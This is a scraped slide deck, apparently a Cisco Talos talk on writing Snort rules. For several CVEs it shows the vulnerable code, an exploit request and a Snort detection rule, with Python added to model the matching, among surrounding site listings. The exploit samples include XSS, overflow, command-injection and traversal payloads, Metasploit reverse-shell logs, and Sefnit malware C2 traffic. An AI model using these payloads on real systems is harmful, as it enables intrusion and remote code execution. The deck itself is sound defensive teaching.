setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000);
</script></body>
</html>
Browser Plugin Detection
#
# <OBJECT> Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( 
msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; 
flow:to_client,established; 
file_data; 
content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; 
content:"LaunchTriPane"; nocase; 
metadata:policy security-ips drop, service http; 
reference:cve,2012-2516; 
classtype:attempted-user; 
)
Browser Plugin Detection
#
# JavaScript Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( 
msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; 
flow:to_client,established; 
file_data; 
content:"KeyHelp.KeyScript"; fast_pattern:only; 
content:"LaunchTriPane"; nocase; 
metadata:policy security-ips drop, service http; 
reference:cve,2012-2516; 
classtype:attempted-user; 
)
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
> Cross Site Scripting
Malware Command Traffic
Cross Site Scripting (XSS) Overview
OSVDB-89893
Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient
sanitization of ‘width’ and ‘height’ parameters sent to the URI:
/includes/components/alertcloud/index.php
Exploit:
/nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
Cross Site Scripting (XSS) Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; 
flow:to_server,established; 
content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; 
pcre:"/[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)/Ui"; 
metadata:service http; 
reference:url,osvdb.org/show/osvdb/89893; 
classtype:web-application-attack; 
)
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
> Malware Command Traffic
Malware Sample Overview
Win.Trojan.Sefnit
Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it.
When the service updater.dll starts it attempts to read tasks from the configuration file
%AppData%\Updater/~conf.dat
Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and
appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the
encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in
the initial request to C2:
GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*
The URI above has the following hardcoded format:
hxxp://<c2domain>/j/<uuid>/<version>
Malware Sample Disassembly
10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>"
10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; |
10015B2F CALL <_wcslen-copystr> ; updater.10001BA4
10015B34 MOV BYTE PTR SS:[EBP-4],1
10015B38 MOV EDI,10112E14 ; UNICODE "<uuid>"
10015B3D PUSH EDI ; /Arg1 => 10112E14
10015B3E CALL <_wcslen> ; updater.100196E1
...
10015BBB PUSH ESI ; UNICODE "<version>"
10015BBC LEA ECX,DWORD PTR SS:[EBP-4C]
10015BBF CALL <substr_loc>
10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX
10015BCA PUSH ESI ; UNICODE "<version>"
10015BCB CALL <_wcslen>
10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX
10015BD6 MOV EDI,10112E08 ; UNICODE "0001"
...
1005A043 PUSH 0 ; /Arg4 = 00000000
1005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001"
1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET"
1005A047 PUSH EDI ; |Arg1 008C9138 = NULL
1005A048 CALL 10058E00 ; updater.10058E00
Malware Command Traffic Detection
#
# C2 request detection
#
# hardcoded urilen
urilen:40,norm; 
# hardcoded uri pattern, begins with "/j/"
content:"/j/"; depth:3; http_uri; 
# ends with "/0001"
content:"/0001"; distance:32; within:5; http_uri; 
# no User-Agent in C2 request
content:!"User-Agent"; http_header; 
# final verification of C2 URI pattern
pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U";
Malware Command Traffic Detection
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( 
msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt"; 
flow:to_server,established; 
urilen:40,norm; 
content:"/j/"; depth:3; http_uri; 
content:"/0001"; within:5; distance:32; http_uri; 
content:!"User-Agent"; http_header; 
pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U"; 
metadata:impact_flag red, service http; 
classtype:trojan-activity; 
)
Call to Action
• Related sessions:
• Introduction to Snort Rule Writing
• Detection Strategies with Snort [DevNet-1126]
• Visit the World of Solutions for
• Cisco Campus
• Walk in Labs
• Technical Solution Clinics
• Meet the Engineer - Available immediately after this talk.
Brandon Stultz
talosintel.com
@talossecurity

PPTX
DevNet Express - Spark & Tropo API - Lisbon May 2016
PPTX
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016
How to Contribute to Ansible
Rome 2017: Building advanced voice assistants and chat bots
How to Build Advanced Voice Assistants and Chatbots
Cisco Spark and Tropo and the Programmable Web
Device Programmability with Cisco Plug-n-Play Solution
Building a WiFi Hotspot with NodeJS: Cisco Meraki - ExCap API
Application Visibility and Experience through Flexible Netflow
WAN Automation Engine API Deep Dive
Cisco's Open Device Programmability Strategy: Open Discussion
Open Device Programmability: Hands-on Intro to RESTCONF (and a bit of NETCONF)
NETCONF & YANG Enablement of Network Devices
UCS Management APIs A Technical Deep Dive
OpenStack Enabling DevOps
NetDevOps for the Network Dude: How to get started with API's, Ansible and Py...
Getting Started: Developing Tropo Applications
Cisco Spark & Tropo API Workshop
Coding 102 REST API Basics Using Spark
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
DevNet Express - Spark & Tropo API - Lisbon May 2016
DevNet @TAG - Spark & Tropo APIs - Milan/Rome May 2016

Recently uploaded (20)

PPTX
Cloud computing and distributed systems.
PDF
Unlocking AI with Model Context Protocol (MCP)
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
Encapsulation theory and applications.pdf
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
PPT
Teaching material agriculture food technology
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Modernizing your data center with Dell and AMD
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Machine learning based COVID-19 study performance prediction
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
PDF
Encapsulation_ Review paper, used for researhc scholars
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Cloud computing and distributed systems.
Unlocking AI with Model Context Protocol (MCP)
Diabetes mellitus diagnosis method based random forest with bat algorithm
“AI and Expert System Decision Support & Business Intelligence Systems”
Building Integrated photovoltaic BIPV_UPV.pdf
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Encapsulation theory and applications.pdf
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
Teaching material agriculture food technology
The Rise and Fall of 3GPP – Time for a Sabbatical?
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
MYSQL Presentation for SQL database connectivity
Modernizing your data center with Dell and AMD
Reach Out and Touch Someone: Haptics and Empathic Computing
Review of recent advances in non-invasive hemoglobin estimation
Machine learning based COVID-19 study performance prediction
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
Encapsulation_ Review paper, used for researhc scholars
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx

Introduction to Snort Rule Writing

  • 2. Snort Rule Syntax # rule header alert tcp any any -> 192.168.1.0/24 111 ( rule action protocol src address src port dst address dst port
  • 3. Snort Rule Syntax # rule option format alert tcp any any -> 192.168.1.0/24 111 ( msg:"Rule Message"; rule option rule option argument
  • 4. rule option: content # content match example alert tcp any any -> 192.168.1.0/24 111 ( content:"ABCD"; # is equivalent to: content:"|41 42 43 44|"; The content match finds a static pattern in network data.
  • 5. content modifiers: nocase # content match modifiers: nocase alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" or "abcd" etc. content:"ABCD"; nocase; nocase makes a content match case insensitive. content matches are case sensitive by default.
  • 6. content modifiers: offset # content match modifiers: offset alert tcp any any -> 192.168.1.0/24 111 ( # skip 2 bytes before searching for "ABCD" content:"ABCD"; offset:2; offset requires the match to occur after the designated offset in network data.
  • 7. content modifiers: depth # content match modifiers: depth alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" within the first 4 bytes of the payload content:"ABCD"; depth:4; depth restricts how far Snort should search for the specified pattern.
  • 8. content modifiers: distance # content match modifiers: distance alert tcp any any -> 192.168.1.0/24 111 ( # find "DEF" 1 byte after "ABC" content:"ABC"; content:"DEF"; distance:1; distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.
  • 9. content modifiers: within # content match modifiers: within alert tcp any any -> 192.168.1.0/24 111 ( # find "EFG" within 10 bytes of "ABC" content:"ABC"; content:"EFG"; within:10; within makes sure that at most N bytes are between pattern matches.
content:"ABC"; content:!"EFG"; within:10;
content matches can be negated.
content buffers
# content buffer example
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABC" within the HTTP URI
content:"ABC"; http_uri;
content matches can be restricted to a payload location, such as the HTTP URI.
content buffers
POST /index.php HTTP/1.1
Host: example.com
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Cookie: this_is_a_cookie=this_is_its_value

firstparam=one&secondparam=two

Buffers:
http_method       POST
http_uri          /index.php
http_header       the request headers
http_cookie       this_is_a_cookie=this_is_its_value
http_client_body  firstparam=one&secondparam=two
content modifiers: fast_pattern
# fast_pattern example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern;
fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher; without it, Snort picks the longest content match in the rule. The fast_pattern serves as the "entrance" condition for rule evaluation: the rest of the rule is only evaluated for packets in which the fast pattern matcher found this content.
content modifiers: fast_pattern
# fast_pattern:only; example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern:only;
fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule "enters". Because it is never re-evaluated, such a content cannot be negated and cannot carry positional modifiers (offset, depth, distance, within), and it is matched case-insensitively, since the fast pattern matcher ignores case.
rule option: pcre
# pcre rule option example
alert tcp any any -> 192.168.1.0/24 111 (
# match the following regex
pcre:"/A[BC]D/i";
pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the closing slash, e.g. /i for case insensitivity. The rules later in this deck also use Snort's buffer flags: /U matches against the normalized HTTP URI, /I against the raw URI and /P against the HTTP client body.
Traffic Triage and Isolation
[Diagram: a funnel that narrows from Normal Traffic through Vulnerable Application Traffic and Vulnerable Parameter Traffic down to Vulnerability Condition Traffic. Axes: traffic volume (shrinking at each stage), speed of the check (fast at the top, slow at the bottom) and traffic type. Cheap fast_pattern content matches isolate the application traffic first, further content matches isolate the vulnerable parameter, and the slow pcre is evaluated last, only against traffic that can actually meet the vulnerability condition.]
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Buffer Overflow Overview
Stack buffer overflow in the AVM Fritz!Box daemon dsl_control. AVM Fritz!Box firmware fails to check the length of user supplied data in an 'se' (ScriptExecute) command sent in a SOAP request to the dsl_control daemon.
Buffer Overflow Overview
dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function:

[...]
DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe);
[...]
Buffer Overflow Overview
DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...])
{
    [...]
    DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};

    if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == DSL_FALSE)
    {
        return -1;
    }

    DSL_CPE_sscanf(pCommands, "%s", sFileName);
    [...]
Buffer Overflow Overview
The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands into the local character array sFileName without restriction or bounds checking (the "%s" conversion has no field width). The size of the vulnerable stack buffer is 256 bytes, as indicated in dsl_cpi_cli_console.h:

#define DSL_MAX_COMMAND_LINE_LENGTH 256

Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.
Buffer Overflow Exploit
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:ifx="urn:dsl_api">
  <SOAP-ENV:Body>
    <ifx:DslCpeCliAccess>
      <command>se "A"*300</command>
    </ifx:DslCpeCliAccess>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Buffer Overflow Detection
# vulnerable SOAP request
# with at least 256 bytes
# within <command></command>
#
content:"DslCpeCliAccess"; fast_pattern:only; http_client_body;
content:"<command"; nocase; http_client_body;
isdataat:256,relative;
content:!"</command"; nocase; within:256; http_client_body;

# stack buffer overflow (>256 bytes)
# within param0: <command> se param0 </command>
#
pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";
Buffer Overflow Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (
    msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt";
    flow:to_server,established;
    content:"DslCpeCliAccess"; fast_pattern:only; http_client_body;
    content:"<command"; nocase; http_client_body;
    isdataat:256,relative;
    content:!"</command"; within:256; nocase; http_client_body;
    pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";
    metadata:policy security-ips drop, service http;
    classtype:attempted-admin;
)
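The rule above chains four payload options whose semantics the earlier slides introduced one at a time: an absolute content match, isdataat relative to the end of that match, a negated content bounded by within, and a pcre. The following Python is an added example, not code from the slides or from Snort: it models those Snort 2.x option semantics (content with nocase/offset/depth/distance/within and negation, fast_pattern:only as an entrance check, isdataat ...,relative, pcre) and runs the rule's body options over constructed SOAP bodies in the shape of the exploit slide. The request bodies, the 300-byte payload and the "padded" variant are all constructed here; the envelope namespace is the standard SOAP 1.1 one.

```python
# Added example (not from the slides, not Snort source): a small model of the
# Snort 2.x payload options this deck uses, run over constructed SOAP bodies.
import re


class Buffer:
    """One detection buffer (here the HTTP client body) plus the cursor that
    relative options measure from: the end of the previous content match."""

    def __init__(self, data: bytes):
        self.data = data
        self.cursor = 0

    def content(self, pat: bytes, negated=False, nocase=False, offset=0,
                depth=None, distance=None, within=None) -> bool:
        relative = distance is not None or within is not None
        # offset/depth are absolute; distance/within count from the cursor.
        start = self.cursor + (distance or 0) if relative else offset
        limit = within if relative else depth
        end = len(self.data) if limit is None else start + limit
        hay, needle = self.data[start:end], pat
        if nocase:                      # bytes.lower() is per-byte, so offsets hold
            hay, needle = hay.lower(), needle.lower()
        pos = hay.find(needle)          # the whole pattern must fit in the window
        if negated:
            return pos < 0              # a negated content never moves the cursor
        if pos < 0:
            return False
        self.cursor = start + pos + len(pat)
        return True

    def isdataat(self, n: int, relative=False) -> bool:
        """isdataat:n[,relative]: a byte exists at offset n (from the cursor)."""
        base = self.cursor if relative else 0
        return base + n < len(self.data)

    def pcre(self, regex: str, flags=0) -> bool:
        """pcre:"/regex/flags" on this buffer; the /P flag is modelled by the
        fact that we are already holding the client body."""
        return re.search(regex.encode(), self.data, flags) is not None


def fritzbox_overflow_body_matches(body: bytes) -> bool:
    """The body options of the rule above, in rule order."""
    if b"DslCpeCliAccess" not in body:  # fast_pattern:only: the entrance
        return False                     # condition, never re-evaluated
    b = Buffer(body)
    return (b.content(b"<command", nocase=True)
            and b.isdataat(256, relative=True)
            and b.content(b"</command", negated=True, nocase=True, within=256)
            and b.pcre(r"<command[^>]*?>\s*se\s[^<]{256}", re.I))


def soap_body(command: str) -> bytes:
    """Constructed DslCpeCliAccess request body in the shape of the exploit
    slide; the envelope namespace is the standard SOAP 1.1 one."""
    return (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
            b' xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><ifx:DslCpeCliAccess>'
            b'<command>' + command.encode() + b'</command>'
            b'</ifx:DslCpeCliAccess></SOAP-ENV:Body></SOAP-ENV:Envelope>')


BENIGN = soap_body("se script.txt")               # ordinary ScriptExecute call
EXPLOIT = soap_body("se " + "A" * 300)             # >256 bytes in the first 'se' parameter
PADDED = soap_body("se script.txt") + b" " * 400   # short command but a long body:
                                                   # the negated </command> check rejects it

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("exploit", EXPLOIT), ("padded", PADDED)):
        print(f"{name:8} alert={fritzbox_overflow_body_matches(body)}")
```

The padded body is the case that shows why the rule needs both isdataat and the negated content: isdataat:256,relative alone is satisfied by any request with 256 bytes of anything after "<command", while content:!"</command"; within:256 insists that those bytes are still inside the command element, which only the overflow achieves.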
Command Injection Overview
CVE-2014-3805
Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007. The SOAP command 'get_log_line' parameter '$number_lines' and the 'get_license' parameter '$license_type' are used in OS commands without sanitization.
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub get_log_line() {
    my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_;
    [...]
    # $number_lines used in OS command without sanitization
    my $command = "tail -$number_lines $r_file";
    my @content = `$command`;
    [...]
}
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub get_license() {
    my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_;
    [...]
    # $license_type used in OS command without sanitization
    my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]");
}
Command Injection Exploit
POST /av-centerd HTTP/1.1
Host: 172.16.8.223:40007
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 765
Content-Type: text/xml; charset=utf-8
SOAPAction: "AV/CC/Util#get_log_line"

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c-gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit
msf exploit(alienvault_centerd_soap_exec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500

id
uid=0(root) gid=0(root) groups=0(root)

remember traffic isolation...
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt";
    flow:to_server,established;
    content:"/av-centerd"; nocase; http_uri;
    content:"<get_log_line"; fast_pattern; nocase; http_client_body;
    content:"xsd:string"; distance:0; nocase; http_client_body;
    pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi";
    metadata:service http;
    reference:cve,2014-3805;
    classtype:attempted-admin;
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt";
    flow:to_server,established;
    content:"/av-centerd"; nocase; http_uri;
    content:"<get_license"; fast_pattern; nocase; http_client_body;
    content:"xsd:string"; distance:0; nocase; http_client_body;
    pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi";
    metadata:service http;
    reference:cve,2014-3805;
    classtype:attempted-admin;
)
Command Injection Overview
CVE-2014-5073
OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi, parameter 'fileDate'. If the 'callType' parameter is set to "DOWN", vmtadmin.cgi passes the value of 'fileDate' to system().
Command Injection Overview
my $actiontype = $query->param("actionType");
my $calltype   = $query->param("callType");
my $filedate   = $query->param("fileDate");
my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...]
[...]
elsif ($calltype eq "DOWN") {
    [...]
    system("rm \"$upload_dir$statusfile\"");
    [...]
Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Command Injection Exploit
msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500

id
uid=0(root) gid=0(root) groups=0(root)
Command Injection Detection
Start by isolating traffic.

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt";
    flow:to_server,established;
    content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
    content:"callType=DOWN"; nocase; http_uri;
    content:"fileDate="; nocase; http_uri;
    pcre:"/[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/Ui";
    metadata:policy security-ips drop, service http;
    reference:cve,2014-5073;
    classtype:attempted-admin;
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt";
    flow:to_server,established;
    content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
    content:"callType=DOWN"; nocase; http_uri;
    content:"fileDate="; nocase; http_raw_uri;
    content:"%26"; distance:0; http_raw_uri;
    pcre:"/[?&]fileDate=[^&]*?%26/Ii";
    metadata:policy security-ips drop, service http;
    reference:cve,2014-5073;
    classtype:attempted-admin;
)
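The two VMTurbo rules differ in which URI buffer they inspect: the first searches the normalized URI (http_uri, pcre /U), which Snort's HTTP inspector has percent-decoded, while the final version searches the raw URI (http_raw_uri, pcre /I) for a percent-encoded ampersand. The Python below is an added example, not code from the slides or from Snort, showing what each buffer sees for three constructed requests in the shape of the exploit slide (the injected payloads are ours, not the slide's). The normalization model is percent-decoding only; Snort's normalizer also handles multiple slashes, traversals and other encodings that these samples do not exercise.

```python
# Added example (not from the slides, not Snort source): normalized vs. raw URI
# for the two VMTurbo rules above, on constructed requests.
import re
from urllib.parse import unquote

# Constructed requests in the shape of the exploit slide; the payloads are ours.
ENCODED_BACKTICK_URI = (b"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP"
                        b"&fileDate=%22%60id%60%22")       # "`id`" percent-encoded
ENCODED_AMP_URI = (b"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP"
                   b"&fileDate=x%26%26id")                 # x&&id percent-encoded
BENIGN_URI = (b"/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP"
              b"&fileDate=07.19")


def normalize_uri(raw: bytes) -> bytes:
    """Model of the http_inspect normalization that matters here: percent
    decoding. Byte-preserving (latin-1) so any raw byte round-trips."""
    return unquote(raw.decode("latin-1"), encoding="latin-1").encode("latin-1")


# First rule: shell metacharacters after fileDate= in the normalized URI (/Ui).
META_NORMALIZED = re.compile(
    rb"[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)", re.I)
# Final rule: a percent-encoded '&' inside the fileDate value, raw URI (/Ii).
AMP_RAW = re.compile(rb"[?&]fileDate=[^&]*?%26", re.I)


def vmtadmin_checks(raw_uri: bytes) -> dict:
    """Run both rules' URI checks against one request and report each stage."""
    norm = normalize_uri(raw_uri)
    isolated = (b"/cgi-bin/vmtadmin.cgi" in norm          # fast_pattern:only; http_uri
                and b"calltype=down" in norm.lower()       # content; nocase; http_uri
                and b"filedate=" in norm.lower())          # content; nocase
    return {
        "isolated": isolated,
        # what the first rule sees: the decoded metacharacters
        "meta_in_normalized_uri": isolated and bool(META_NORMALIZED.search(norm)),
        # the same regex applied to the raw bytes finds nothing: they are still %xx
        "meta_regex_on_raw_uri": isolated and bool(META_NORMALIZED.search(raw_uri)),
        # what the final rule sees: %26 in the raw value
        "encoded_amp_in_raw_uri": (isolated and b"%26" in raw_uri
                                   and bool(AMP_RAW.search(raw_uri))),
    }


if __name__ == "__main__":
    for name, uri in (("backtick", ENCODED_BACKTICK_URI),
                      ("amp", ENCODED_AMP_URI), ("benign", BENIGN_URI)):
        print(name, vmtadmin_checks(uri))
```

Two things fall out of running it. Percent-encoded metacharacters such as %60 are invisible to a regex run on the raw bytes, which is why the first rule's metacharacter class is applied to the normalized buffer. Conversely, a `&&`-chained command is not in that rule's character class at all, and after decoding its `&` is indistinguishable from a parameter separator; in the raw URI an encoded `%26` inside a parameter value is an unambiguous signal, which is a plausible reading of why the final rule switches to http_raw_uri (the slides do not spell out the reasoning).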
Directory Traversal Overview
CVE-2014-2424
Directory traversal vulnerability in Oracle Event Processing. The FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value. The WMI service can be abused to convert the file upload into remote code execution without user interaction, by writing a .mof file into the wbem\mof directory as the exploit below does.
Directory Traversal Overview
private void processUploadedFile(FileItem paramFileItem)
{
    try
    {
        // paramFileItem.getName() used to
        // create file without verification
        paramFileItem.write(new File(this.uploadLocation, paramFileItem.getName()));
    }
    catch (Exception localException)
    {
        [...]
    }
}
Directory Traversal Exploit
POST /wlevs/visualizer/upload HTTP/1.1
Host: 172.16.8.29:9002
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828
Content-Length: 2658

--_Part_732_2993821416_1334322828
Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

#pragma namespace("\\\\.\\root\\cimv2")
[...]
Directory Traversal Exploit
msf exploit(oracle_event_processing_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.198:9002 - Generating payload and mof file...
[*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...
[*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof
[*] Sending stage (769536 bytes) to 172.16.158.198
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500
[+] Deleted wbem/mof/klIvousnq.mof
[!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Directory Traversal Detection
#
# Multipart POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
content:"filename"; nocase; http_client_body;
content:"Content-Disposition"; nocase; http_client_body;
pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi";

#
# Urlencoded POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
content:"filename="; nocase; http_client_body;
pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim";
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt";
    flow:to_server,established;
    content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
    content:"filename"; nocase; http_client_body;
    content:"Content-Disposition"; nocase; http_client_body;
    pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi";
    metadata:policy balanced-ips drop, policy security-ips drop, service http;
    reference:cve,2014-2424;
    classtype:attempted-admin;
)
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
    msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt";
    flow:to_server,established;
    content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri;
    content:"filename="; nocase; http_client_body;
    pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim";
    metadata:policy balanced-ips drop, policy security-ips drop, service http;
    reference:cve,2014-2424;
    classtype:attempted-admin;
)
Use-After-Free Overview
CVE-2013-3893
